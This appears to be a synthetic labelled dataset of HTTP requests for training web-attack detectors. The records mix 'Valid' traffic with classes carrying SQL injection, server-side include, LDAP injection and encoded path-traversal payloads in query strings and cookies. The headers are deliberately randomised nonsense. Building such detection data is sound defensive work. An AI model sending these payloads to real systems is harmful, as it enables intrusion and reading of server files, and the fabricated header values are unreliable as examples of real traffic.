If-Range: Mon, 25 Apr 05 11:01:10 GMT
Max-Forwards: 3969
MIME-Version: 8.2
Pragma: l0c='A9'
Proxy-Authorization: dxJs etmod=s7sntn
Authorization: aHpk mrhla=ysgate5a
Range: 40-66,-706
Referer: http://ngaTra.org/fztante/dm6rts.bin
TE: chunked;q=0.8,chunked;q=0.8,deflate;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 8.1; tl-op; rv:8.2.4) Gecko/58084297
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 525x9630
Via: HTTP/5.3 www.noab.htm, 7.6 247.146.111.215, 4.9 104.172.66.133
Transfer-Encoding: gzip
Upgrade: lhdsEe/5.9, eiyn/0.7, ajfots/4.0
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 045569580616206660
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23240
Start - Id: 15640
class: Valid
GET /h39sww/gRdp3eMk3sFghUpMWg/cvnuTz47Nd/8ylkmF95ZylkfXk/onelncynetn/sovrnxoSu/igap/lsfb3NtyzI5L/apsdisnsorDfatu.jpg?allasircore2r=script%7Ek%3B1dcopyptreoe%26&thshke6ilnys=117785&ee3Hjeeyn5cAlrI=eq69_ip89vq&ziuiiMteow=9eh+chnajrri HTTP/1.0
Host: www.3nsnhbn.de
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.5, iso-8859-15;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-age=094
Client-ip: 55.236.104.173
Cookie: rCreplaceUftpY=f)w
Cookie2: $Version="8"
Date: Sat, 05 Aug 06 14:29:01 GMT
ETag: "pGM9yZSdXA54TzV"
Expect: os6bi=AtHottq;ytotu
From: I7rTtta@huqE8t.de
If-Modified-Since: Fri, 18 Jun 04 03:12:42 UTC
If-Unmodified-Since: Thu, 02 Oct 08 20:46:11 CET
If-Match: *
If-None-Match: *
If-Range: "h5bJ8IaT8YCI50c"
Max-Forwards: 21
MIME-Version: 9.3
Pragma: r=iomesk
Proxy-Authorization: NTLM YXJUbHRpZXZlaG9wbHN0cHdzbmV0bnBvemx0YVNpdHQ1bGxuaHdsb2pjc1R0M21p
Authorization: hnok Oehute=isMoljhh
Range: 3-,76842-90
Referer: http://www.t9meEm.it/sGasn.jsp
TE: deflate,deflate
Trailer: Warning
User-Agent: EeSh7eoShhwrz
UA-CPU: PowerPC
UA-Disp: 6429,5125,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: 9.5 11.168.185.171:53626, 6.2 201.20.178.10
Transfer-Encoding: deflate
Upgrade: odwtz/6.3, AUn/9.5, aov1R/9.7, wrym/4.9, euo/6.2
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15640
Start - Id: 22953
class: Valid
GET /mDLRQ17xWofvSbz/nsezesmie8huo/8RcmdBJ_3dcP0/aUq42FXMcT7x8/mqofCmJsSLA4wzVsXR/dcuIj5IG.Gf7lQ/huMlmpcMoGH/e0w4snhnT/RqX_4oKxJNJS/knoewrtmEssmnwh7l.css?do=771120&f1eMa=%2Bjeat&ghe293aNc=45&ts=rboot.inidm-maila6U&I718=2q HTTP/1.1
Host: 25.220.228.42
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=43
Client-ip: 67.214.101.60
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="2"
Date: Sat, 26 Mar 05 10:47:26 UTC
ETag: "ccKk8LrcO2k1cAc2Rtw"
Expect: otsud
From: ebcNord@jpan.biz
If-Modified-Since: Mon, 10 Oct 05 02:46:39 GMT
If-Unmodified-Since: Sun, 24 May 09 18:46:44 CET
If-Match: *
If-None-Match: "6Agu-BhhPEyDhM5"
If-Range: Fri, 02 Feb 07 17:54:43 UTC
Max-Forwards: 3160
MIME-Version: 1.1
Pragma: eIoreos=dap
Proxy-Authorization: Basic dHByY2xVOmxmZTFP
Authorization: NTLM c3hkbHlwdHNuaG9tcWllYTVsdGZlaG5odDdubDF0QWRyb2t1RTk=
Range: -294148
Referer: /uJstsN/6geannr.rar
TE: trailers,chunked
Trailer: Pragma
User-Agent: ntouwya
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: 4stcm/0.9 75.243.201.129:94136
Transfer-Encoding: identity
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 349 167.176.37.95 "eumteoh1rgy6orin" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22953
Start - Id: 42564
class: SqlInjection
GET /s./ouie3a.jpg?feTsytcEP=a7CqSl1iY&yaatfs30q=9432134&tl=2916332&jggincludeYAf=uatue3e4axhpie3&socaa5rinhse06=%27+++OR++%27nnerreitf4r%27+++%3D+%27phe%27%2B%27mralxeu%27&edu=49245&ijflocationYJnetcatGH9R=2856352580 HTTP/1.0
Host: www.Gt9VmaYoe.biz
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-8859-4;q=0.5, windows-1250;q=0.5, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=2262
Client-ip: 221.121.37.212
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="57"
Date: Thu, 08 Jun 06 09:29:05 GMT
ETag: "TraGuu_QjplOnZR"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 17 Aug 08 15:50:10 UTC
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: *
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6101
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: Basic ZHh5Vjphb01zaw==
Range: -05,8037-,228664-
Referer: http://www.fosUari.ch/rre1orgs.cgi
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 4.3; rr-uq; rv:9.2.9) Gecko/00319942
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: 1.4 www.tia5.png, 3.9 86.206.223.109, 0.3 www.nbhamA.js
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42564
Start - Id: 39524
class: SSI
GET /6V/Rphp2idscriptv/l57tczt/hkti5iswUu0r/dcM/chsYYy_n-laKI1O9Onp/3zN69HotNvtCF7rMGzG/aN@30XPH6E1FUd/7dstnslprpeh/s6PTAEuBdeDwupMdSV/eDOaOuBsDoz85/tej.css?SdYeZ49gEE=09501517&eksdkefxc7f=hkkraeL HTTP/1.1
Host: www.aoy7uie3.uk:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-hebrew;q=0.9, x-mac-roman, hz-gb-2312;q=0.1
Accept-Encoding: 
Accept-Language: HoOcasa-1iB;q=0.0, 4-epat;q=0.6, a8o-zupe;q=0.9, hymetYu-moapie;q=0.3
Cache-Control: min-fresh=8412
Cookie: nyyepuQhfoesa=0495990;ai=<!--   #include  virtual="/var/log/httpd/access.log"   -->;Dtqo4t7ncsbeee=2lyretuTtAak3ou
Cookie2: $Version="6"
Date: Sat, 03 Oct 09 03:45:56 CET
ETag: "TfPCX0b-4egAHpkl"
Expect: 100-continue
From: ratp@hrud.cz
If-Modified-Since: Mon, 26 Apr 04 12:53:38 GMT
If-Unmodified-Since: Fri, 15 Jan 10 24:37:11 CET
If-Match: "DvISLX9H6xMhFl3r_vCO"
If-None-Match: "XdHmZl8.zhVDbotxuY"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM emFpZWlyYW9vc21uZWVpbHJhZXdjZW81YUllTHNlZWFybWhmcmE2dG9hc2U=
Range: 649-,-625813
Referer: http://0gen.uk/s0hopri/ewngcfe/dsuRtso.wmn
TE: trailers,gzip;q=0.8,trailers
User-Agent: ne9w (1Gn5UvZK; sNw-@Mks)
UA-Disp: 5411,432,8
Via: HTTP/7.7 200.160.25.99:27000
Transfer-Encoding: 7nalt; qen5sri=eapdd2Le
Upgrade: oin5d/6.0, 4EHtc/7.8
Warning: 643 www.Of6an7hu.tiff "ahmCgzcJ" "Thu, 08 Oct 09 18:26:52 UTC"
X-Forwarded-For: 81.239.118.138
X-Serial-Number: 219629
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39524
Start - Id: 15311
class: Valid
GET /idHdQOYdUJ0ML/SDf_sb-IinsertU.n0/eFJlOG9Q/oHhol/betweeninFD/ej8XPCf/0TjQ-v5O/0BDOYxR-Wi_8JJm0@fTH/qlpsteTaNdt/tV-L7qZ5PaCJYSQTO/bo1luosemu2ehali/%uRyUIr1eqcatweechoo.tiff?eaqoio8vhsyuJ=aK&imhliehh=1&dnat=+%3Bevalw&nEaLOwnaeprhii=++wUinoarin&egisrlx9sN=aa&CfE=rtelnet&i4medoe=c5ia4l7ees2tyls7oo&nbinXQqSvbscript@=grywpdddweite&ve9sllEdilh4k=071312&uaileethi2neol=hZnC5C&wweeWTueLhaasD=fp7SE&irSi=3 HTTP/1.0
Host: www.lss5Nerrad.ch
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=675
Client-ip: 4.91.57.71
Cookie: we=67;44ai67s=510;etbHasa9yl=tHgSs3a
Cookie2: $Version="77"
Date: Sun, 02 Apr 06 24:49:59 GMT
ETag: W/"wC8rBWuKAC-CzWi"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Mon, 31 Oct 05 06:52:01 CET
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 15
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtaas7"
Authorization: NTLM ZW9zZGVvc2VkVGhndHJyeGRsbmVIRW5pU3A4b2RhYWhsbm9pcm5JbmNheXBodTF0
Range: 604-0,1-54,-12
Referer: /a12tAeon/ssdl57ut/eHctN/4oge4rt/dsbc3b.mdb
TE: gzip,trailers
Trailer: Expect
User-Agent: lge9ieiaNp72ieoy
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9424x098
Via: FTP/4.5 www.a3tuo.css, FTP/0.1 www.dydlto0I.png
Transfer-Encoding: compress
Upgrade: 3ru/9.4
Warning: 649 149.116.106.106 "Fb6sieGmla8" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15311
Start - Id: 38383
class: LdapInjection
GET /i4mFjHgmh7kSe.jpg?efeqEe=a%267%40objecthh8iai3L&aso8Oc0csdime=3895055&QA1l=2784556&os=hrn5su%3Coys%3Fexralek&leey=hc7I_lA.m&nm11ai=%29++++%28+%7C++++%28++++cn%3D*o%27brien*++%29%28mail++%3D*o++%27brien*++%29++&eraoeeT=ftkFw&pthior=oWehscfesyo3&styleZpuVP5fpassthruXiframe=70404011&@VpZt=e7dr_SiO6CgN&8oai3t=32amzfeavagse1os&XwxL=wdUJ.Q_acDU5 HTTP/1.0
Host: www.eimeainof.fr:95285
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: npwiNry7-c, st66fsI-ea;q=0.6
Cache-Control: no-store
Client-ip: 64.84.236.66
Cookie: passwd9KPT=iiT;TnddoxhcciiqDs==Th+ih;nh9o=9283;eyadasjjethanho= %ufo7rrFrmeerrxp_t;litedptnozgPesi=nAxy43.R
Cookie2: $Version="386"
Date: Sat, 01 Jan 05 14:18:55 UTC
ETag: W/"E.2nb8DPVE2Tf_9"
Expect: 100-continue
From: e3ig@cUsnasr.com
If-Modified-Since: Fri, 02 Feb 07 24:28:00 GMT
If-Unmodified-Since: Sat, 08 Jul 06 05:35:59 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6354
MIME-Version: 7.6
Pragma: esatre='Dieas'
Proxy-Authorization: Digest cnonce="mn9qe5l"
Authorization: eNFens l1wdt8n=iPqidlhr
Range: 5-3896,18685-499682,-36
Referer: http://www.Pnrh.org/soqt.mdb
TE: gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: hhhgrhSrha
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: ocess5/0.8 181.220.211.32, g3ewgb/3.0 www.wed6y.js
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38383
Start - Id: 16913
class: Valid
GET /oOx3LchFpX5X7N7@EVL/kq1rttlnubr5uOsx4onf/vamFteeeN95fiano.php?mw89br=317218&ydNs=980353&ii=HisitHtatcNriitter&i5mxen=nPI7&tbtTnhlti=4583 HTTP/1.1
Host: www.erhuea5ttn.de
Connection: evnrF0X
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: tirhnrfr-eowa;q=0.7, y-Aleyr5ao, srf-6gd
Cache-Control: no-transform
Client-ip: 254.25.138.231
Cookie: tatnsNl1=cs;qtfALirB4elpo=aIKJBki4CYWN;Ditnopionis=5789782
Cookie2: $Version="10"
Date: Fri, 29 Aug 08 11:55:00 UTC
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Thu, 06 Apr 06 15:08:48 UTC
If-Unmodified-Since: Sun, 13 Jul 08 12:50:31 CET
If-Match: "250FYWBG_ZiZDceq"
If-None-Match: "83tAWRELmye7Uq5Zb5"
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 8684
MIME-Version: 7.6
Pragma: kesAaflr=tFrmeDne
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM MnRlemlhUGVlR3pyQnRQME8xdGpydDZyZzhhYmVsU3J1MWVpaXVl
Range: -3
Referer: /seZaartr.php3
TE: deflate;q=0.5,deflate;q=0.6,chunked
Trailer: Accept
User-Agent: nieygse8N8
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x8989
Via: uad/2.7 140.236.54.111, 3.9 48.167.250.93, 2.8 www.x3lShKrr.shtml
Transfer-Encoding: gzip
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 857 163.225.188.126 "yherr" "Tue, 27 Jan 09 20:54:03 UTC"
X-Forwarded-For: 164.142.194.146
X-Serial-Number: 49349501670921026
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16913
Start - Id: 14226
class: Valid
GET /4t0nmItst7wazearh/han/ai-/eVk8yOSEH/sW/5WG_uD.cfm?deleteJvHopttlA=re+&rrmlinkGZ-N.6gu=a2uCN8HRxF&rsetvsx=a78hJ&topcwirqseteu=nidGhh%7Esllipsb HTTP/1.0
Host: www.tTzedorz.de:80
Connection: keep-alive
Accept: video/*, text/plain;q=0.0, audio/basic;q=0.9
Accept-Charset: windows-1251, utf-8;q=0.2, x-mac-icelandic;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: lidEa-jccrTeg, grtg12en-r;q=0.2, re8gfr0-feLntmo;q=0.3, or-eiQLdusn;q=0.7, d69n-flp5
Cache-Control: n7='osfas'
Client-ip: 209.157.94.216
Cookie: horeoni=8ne0;VhtaccesJgp=rfe;nnodamn5n=3486929;soeiebsmcoDSdl=19819;Este=97994
Cookie2: $Version="64"
Date: Sat, 26 May 07 04:23:59 UTC
ETag: W/"x2PsmEFfmsFIF9qDP."
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sun, 27 Feb 05 11:06:38 CET
If-Unmodified-Since: Fri, 02 Nov 07 14:55:22 GMT
If-Match: *
If-None-Match: "kAfb.O77-ct0Zk7W5@"
If-Range: *
Max-Forwards: 841
MIME-Version: 0.5
Pragma: sat='ue'
Proxy-Authorization: NTLM dnIwU0xlOGhhbnNvZW1SZGU0b2Nhb3Vlc2h3b2k4blZvb2hEaGdscjJpZHV0bg==
Authorization: nuGtuw txQhm=eefs
Range: -901847,5-685
Referer: http://www.lGyo8.be/hvjee2/oieno/aRhn/rxb4aht/eiDim.php4
TE: chunked;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/6.7 (compatible; rosct7s; Open BSD i386; tNacsobveG; griao)
UA-CPU: x86
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: ober/5.2 www.5obdDkie.shtml
Transfer-Encoding: gzip
Upgrade: tqng/4.9, Naqt/0.6
Warning: 630 161.43.213.50:09 "naobucoLe" "Wed, 08 Sep 04 16:18:59 UTC"
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 21052565504410930240
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14226
Start - Id: 338
class: Valid
GET /KevnmtkqmaidkHhexua/trdhp9atwta/eDtr9/iraaitldtd0E/esaZkUgr9T@gDz/oA3x/NautoexecjOpNrc9JOZftp/w0spUShr/rE4nmhEiaNmdrqee3.mdb? HTTP/1.0
Host: www.trntas.ch
Connection: keep-alive
Accept: audio/basic, audio/*;q=0.7, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 21dG-eikadq5A;q=0.6, deu5h-ni, be-Nm2kS, Ni-seae, 2fa-rngosoy;q=0.7
Cache-Control: max-age=28
Client-ip: 95.181.249.85
Cookie: @-qK-kyBjxN.=k=null
Cookie2: $Version="7"
Date: Tue, 31 Mar 09 23:45:20 UTC
ETag: W/"zxMVFeGsO-szSO5fl"
Expect: 100-continue
From: yifn@s7icOeis.org
If-Modified-Since: Sun, 14 May 06 13:13:48 UTC
If-Unmodified-Since: Sun, 13 Dec 09 07:01:59 CET
If-Match: "afR3ph5UQVrX9qu1M7Y"
If-None-Match: "YU_@4W2UYui0M_hek-c"
If-Range: Sun, 25 Nov 07 16:01:22 GMT
Max-Forwards: 6048
MIME-Version: 1.9
Pragma: LrBl=ncgasut
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: Digest nc=C6b24fCA
Range: -174,-56
Referer: /opbRpne.swf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: ra3os (rd.7Xz; amjoc4cTE; sZX-4.m3lj; oyX6hYK6.v; aMWFIbzxvp)
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x4525
Via: 2.3 119.200.122.142
Transfer-Encoding: gzip
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 065 www.andsxH.js "Etsas1arbstnjlte" 
X-Forwarded-For: 128.82.39.150
X-Serial-Number: 2216380561950619678
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 338
Start - Id: 23056
class: Valid
GET /oi2vtwtdoonqtnh/tfQV@qF4FdvuFG/twtXOJeueRxkmcOa1/eYPd_n7cOQ-iATT/eazr91KvRtb59XM4HD/c1UuJ/em/ENtEC/tsSfo/tXtfB._tVT8_/ox-zAXG/svSbT.htm? HTTP/1.0
Host: www.mdbtedu0aa.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: da-eest1t;q=0.3, aiao0t-anujlqc;q=0.0, eA9-es, bApnfst-itldE6;q=0.5
Cache-Control: max-stale
Client-ip: 109.212.182.25
Cookie: eVusceauimcls=9019
Cookie2: $Version="511"
Date: Fri, 07 Aug 09 16:50:46 GMT
ETag: "7qUh3CQVD7qRGZjvNt"
Expect: gosn
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Sat, 19 Nov 05 07:14:44 GMT
If-Unmodified-Since: Fri, 14 Aug 09 24:10:38 UTC
If-Match: "O2C3MU5ZD7Q2DZxc"
If-None-Match: "uw-YdA.YTxd2H_5BbZV"
If-Range: *
Max-Forwards: 52
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: te3gi lgiorr=rcre
Authorization: NTLM cjFtQm1jRDRlZWJmYjdvc2hydGxpOWV2YVFiZXhzaHRlcnRuN2Y3ZG9jdw==
Range: 3-
Referer: /ntui/9d93b/oatacA.asmx
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/5.3 (compatible; MSIE 2.6; Open BSD i586; aDfg; eelrrodtc; lRl5u0idl)
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 869x269
Via: 8.2 248.132.133.4
Transfer-Encoding: deflate
Upgrade: ncdhiw/3.5, oaki/2.2
Warning: 007 www.oobensO.tiff "sn6eP" 
X-Forwarded-For: 239.44.113.150
X-Serial-Number: 445404957827003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23056
Start - Id: 45012
class: PathTransversal
GET /hmtet3ndtrno4erau/oq6tuhriOrahruDunim/1bdin/oemsoaqpTrnpyieehv/i9hsne2tsu/ByTO.exe?9sr4=4nslinkchild5ne&t7ddng=6&w4iewreowemasra=ak-&orarW7eoiau7a=fRwWnM4%40&esnetzr97uhqa=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&o7ian3lranocfez=koTmo HTTP/1.0
Host: www.ajavny.cz:80
Connection: close
Accept: image/*, application/*, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ees-sm, e-5of;q=0.5, SbUlti-rFcir;q=0.2
Cache-Control: Wsnebese=fLes
Client-ip: 198.103.214.122
Cookie: wmdiiab=l4eSivar>NunionSn0pd/m Tcc;boesatabnn=6eO3NNo;iootooiwIet7ehe=bo0zsh;F1lrsklC=625473
Cookie2: $Version="75"
Date: Mon, 09 Jan 06 07:05:37 GMT
ETag: "5XlM8rQ.XAqXjiaL"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Mon, 31 Aug 09 24:54:47 UTC
If-Unmodified-Since: Thu, 14 Jun 07 23:02:58 GMT
If-Match: *
If-None-Match: "RXYMipQYG74rnckMROlc"
If-Range: Sun, 08 Jun 08 21:31:36 GMT
Max-Forwards: 95
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 268-476063
Referer: http://www.yerg6.org/nagc/wUoLCnts/srbrad.php
TE: chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.8 (X11; U; Solaris 7.3; zz-em; rv:7.3.9) Gecko/59718970
UA-CPU: StrongARM
UA-Disp: 100,251,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 569x3212
Via: 7.5 154.74.41.239
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 905 www.lcnirad.jpg "ertiesldpoemzr7i" 
X-Forwarded-For: 179.111.85.226
X-Serial-Number: 7649860501492903
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45012
Start - Id: 37447
class: LdapInjection
GET /95P_aroGOjkbTTWvPN4/udnnn.jpg?lct=y&aprignt5oDaeN=aTpTqt94-&exeeenOqoyxd=nbodywg&1e=eyognrn5atct&As7yudiavDge=tDFIIED&ofknblrwso=25&eus=4668845 HTTP/1.0
Host: 156.26.2.107:472
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 134.8.200.85
Cookie: cixicut=51)(&(objectClass=tie)(|(sn =    olim)(cn=o     J*))
Cookie2: $Version="01"
Date: Sun, 17 Jul 05 24:48:48 CET
ETag: "hP0i7Xp59mTBOKjFVz"
Expect: 7gtigo=2yBreew;j78Oana=frat1n
From: O07auva@tiv1s.de
If-Modified-Since: Mon, 09 Feb 04 10:13:30 CET
If-Unmodified-Since: Mon, 18 Aug 08 24:01:13 CET
If-Match: "4sln5M775c9W-fk"
If-None-Match: "tmLbuGZL34ubDhKOghq"
If-Range: *
Max-Forwards: 934
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bk1OOXNmaW1yN2d1ZWVoM2xpZTZlZWl0VnRvdGlxaGExZWZlbHVnZWZvcg==
Authorization: NTLM cGVkaWh0bG5zaWU5dHlhbmFwc2xTbHJvY2hwb242dU1oYXR3bw==
Range: 09-,89735-685,29-440
Referer: /iaofn/io0mg/oe2seopT/ntadauar.tar
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.5 (compatible; MSIE 4.9; Open BSD i386; cjBa21c; 3setSdh4)
UA-CPU: MIPS
UA-Disp: 391,4064,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9256x5085
Via: FTP/3.2 18.47.82.144, 3.1 www.r4iaenem.js, 1.7 www.raasKa.jpeg:6877
Transfer-Encoding: gzip
Upgrade: o1te/3.9, e0te/6.5, 0estiY/4.9
Warning: 468 www.gctRbegg.shtml:3583 "godhcxdtTN" 
X-Forwarded-For: 157.150.92.233
X-Serial-Number: 9320114880
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37447
Start - Id: 25130
class: Valid
GET /97/excQXyBBQe-2unF.ckjg/a@_Q@_jZ4B/tn46passthru/idimgand21siggMH/eZOHmuRV7v3.swf?nawmDjemnrhn=n9nlefnlcti4ia&gj9dnes=a-KAlS HTTP/1.1
Host: 33.124.48.144:80
Connection: hEabsemn
Accept: image/jpeg
Accept-Charset: iso-2022-jp, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: octwi1b-s5rhE;q=0.9, e-eh;q=0.5, y-ib;q=0.3, aotenue-a;q=0.2
Cache-Control: max-stale=9788
Client-ip: 50.246.101.43
Cookie: eeaelo=75601400;S5wshpe14aRrmI=27792723
Cookie2: $Version="0"
Date: Tue, 14 Jul 09 18:18:28 UTC
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: hSMh=itnee
From: ucsmIesc@tbh3i.it
If-Modified-Since: Mon, 16 Oct 06 14:31:11 GMT
If-Unmodified-Since: Wed, 23 Jun 04 23:57:39 UTC
If-Match: "Qck8wESYDJbFuxYU4f"
If-None-Match: "odpGV.vdk.nPrHtUp82"
If-Range: Wed, 15 Oct 08 24:58:59 CET
Max-Forwards: 1200
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Basic dW1pdDplbGR6dGFzYg==
Range: -47756
Referer: http://www.lRamls.gov/fees2tp.cgi
TE: deflate,chunked;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 4.0; 1g-br; rv:5.4.5) Gecko/04871568
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: FTP/2.0 www.izpqn.html
Transfer-Encoding: gzip
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 04027
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25130
Start - Id: 34000
class: Valid
PUT /6usmghIS/e1IJ8ol@.21/arba/w99FWod3/CN1BdNS3pi1xHAR/AbiimwionhIdwee/ci/z9oznyesrfdnop5ltm/is39sni4ats3sdRda2ga/h3cuCuftd.png? HTTP/1.1
Content-Length: 34
Content-Language: a3woitml,Nsnj,swm2lsm1
Content-Encoding: deflate
Content-Location: http://www.e7emu4.biz/Itaeri.tiff
Content-MD5: bXhaa2dtNW50VGVlcmM5cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 May 07 21:25:34 UTC
